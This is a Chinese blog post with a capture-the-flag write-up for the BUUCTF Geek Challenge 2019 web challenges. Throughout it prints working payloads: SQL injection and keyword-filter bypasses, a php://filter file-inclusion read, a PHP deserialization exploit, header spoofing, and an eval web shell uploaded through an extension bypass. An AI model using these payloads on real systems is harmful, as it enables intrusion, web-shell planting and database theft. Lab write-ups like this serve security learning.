[BUUCTF][极客大挑战 2019]web wp

最新推荐文章于 2024-02-15 22:18:56 发布

Snakin_ya

最新推荐文章于 2024-02-15 22:18:56 发布

阅读量484

点赞数 2

分类专栏：刷题记录文章标签： php mysql 数据库

本文链接：https://blog.csdn.net/cosmoslin/article/details/120681288

版权

刷题记录专栏收录该内容

56 篇文章 3 订阅

订阅专栏

Havefun

F12

EasySQL

1' or 1=1#

Secret File

查看页面源代码，发现跳转至action.php时实际跳转到了end.php，抓包

发现secr3t.php，得到源代码

<?php
    highlight_file(__FILE__);
    error_reporting(0);
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

文件包含，使用filter协议

php://filter/read=convert.base64-encode/resource=flag.php

Knife

蚁剑一键连接

PHP

源码泄露，www.zip

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

简单的反序列化（更改属性值绕过__wakeup）

<?php

class Name{
    private $username = 'admin';
    private $password = 100;
}
$a=new Name();
echo serialize($a);
?>

Http

查看源代码，发现Secret.php

Referer: https://www.Sycsecret.com
User-Agent: Syclover
X-Forwarded-For: 127.0.0.1

upload

文件上传，过滤了<?以及.php后缀

<script language="php">eval($_POST[1]);</script>

使用.phtml绕过并加上文件幻术头，更改如下

蚁剑连接即可

知识点：常见一句话木马免杀以及后缀绕过

BuyFlag

F12

if (isset($_POST['password'])) {
	$password = $_POST['password'];
	if (is_numeric($password)) {
		echo "password can't be number</br>";
	}elseif ($password == 404) {
		echo "Password Right!</br>";
	}
}

抓包结合页面信息

POST：password=404a&money=1e9
COOKIE:user=1

LoveSQL

判断字段数

?username=1' order by 3%23&password=1   #正常
?username=1' order by 4%23&password=1	#报错

查数据库

?username=-1' union select 1,1,database()%23&password=1

查出库名geek，继续查表

?username=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

那么我们猜flag应该在l0ve1ysq1，查字段

?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='l0ve1ysq1'%23&password=1

查数据

username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

BabySQL

简单fuzz一下，发现过滤了or, select,where, union等关键字。

这里使用双写绕过就好啦！

查表

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

得到表名b4bsql,geekuser

查列名

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

查数据

?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

RCE ME

见我另一篇博客吖

Snakin_ya

关注

2
点赞
踩
0

收藏

觉得还不错? 一键收藏
打赏
0
评论
[BUUCTF][极客大挑战 2019]web wp

HavefunF12EasySQL1' or 1=1#Secret File查看页面源代码，发现跳转至action.php时实际跳转到了end.php，抓包发现secr3t.php，得到源代码<?php highlight_file(__FILE__); error_reporting(0); $file=$_GET['file']; if(strstr($file,"../")||stristr($file, "tp")||stristr($file,
复制链接

扫一扫